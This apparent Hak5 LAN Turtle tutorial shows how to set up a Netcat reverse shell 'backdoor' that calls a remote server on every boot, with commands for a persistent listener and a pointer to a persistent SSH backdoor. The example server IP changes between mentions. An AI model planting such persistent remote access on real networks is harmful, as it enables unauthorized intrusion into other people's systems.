Your First Reverse Shell
“Netcat (often abbreviated to nc) is a computer networking service for reading from and writing to network connections using TCP or UDP.
Netcat is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation its user could need and has a number of built-in capabilities.
Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.” ?Wikipedia
In this section we’ll set up a “backdoor” on the LAN Turtle with Netcat. This will be achieved by configuring a server online to host a Netcat listener on port 8080. Then on the LAN Turtle we’ll configure the Netcat Reverse Shell module to connect to the server on boot.
Begin by SSH’ing into your online server. There are many inexpensive options for this, and a good VPS or shell is highly recommended. Most VPS hosts come with a static IP address and the operating system of your choice. In this example we’ll assume you have an Ubuntu server at 126.96.36.199. From the SSH session with your Ubuntu server online, start a netcat listener on port 8080.
nc -lp 8080
Netcat is included by default on most Linux distributions. If it is not, try installing it from the repositories. For example, on Ubuntu you may use apt-get to install netcat with the following:
apt-get install netcat
With our netcast listener running on the server online, we’re ready to configure the LAN Turtle. From the SSH session with the LAN Turtle, navigate to the Modules section of the Turtle Shell. Select the NetCat Reverse Shell module and configure. When prompted, enter the IP address and port number of your server’s netcat listener. In our example the IP address is 188.8.131.52 and port number is 8080. Tab over to Submit and press enter to save these values.
Now that the NetCat Reverse Shell module is configured, it can be tested by tabbing over to the Start option and pressing enter. You’ll receive a notice that the module has started. Press enter to return to the module screen and notice the current status and bootup status.
From the NetCat listener on our server it may not be apparent that anything has happened. This is because the netcat reverse shell does not pass over the prompt. That said, issuing a command will execute on the LAN Turtle just as it would over an SSH connection. Try concatenating the login banner.
From the SSH session on the LAN Turtle, tab over to the Stop option on the module screen and press enter. You’ll receive a notice that the module has stopped. Now go back and notice the netcat listener on the server. It will have terminated. This means we’ll be unsuccessful if you attempt to start the module again. To solve this issue, we can either use a version of NetCat with a keepalive option, or run the NetCat listener in a screen session inside of a while loop.
From the server, try the following:
screen -dmS netcat_listener bash -c 'while true; do nc -lp 8080; done'
This will create a new detached screen session that will stay persistent even after you disconnect the SSH session with the server. The screen session will be running the bash one-liner while true; do nc -lp 8080; done. This simple while loop means as soon as the NetCat listener terminates, it will start again. You can display the running screen sessions with the screen -list command, and reconnect to a running screen session with the screen -r netcat_listener command. Detatch from the screen session again using the CTRL+a, d keyboard combination.
Similar to NetCat, if screen isn’t installed by default on your server you may install it from the repositories. For example, on Ubuntu you may issue apt-get install screen.
With this more robust listener running, we can now enable the NetCat Reverse Shell module on the LAN Turtle. With the module enabled, the reverse shell will attempt to establish with our server every time the LAN Turtle boots.
Now this is a very basic reverse shell over NetCat. It can be used to manage the LAN Turtle from afar, as long as both you and the LAN Turtle have access to the server online. It illustrates the basic process of configuring, testing, enabling and deploying a module on the LAN Turtle.
Taking this a step further, I highly encourage setting up a persistent reverse shell over SSH since the AutoSSH module is much more robust than netcat and has built-in keepalive features. The process is very similar – it just requires configuring public / private key-pairs from the keymanager module first.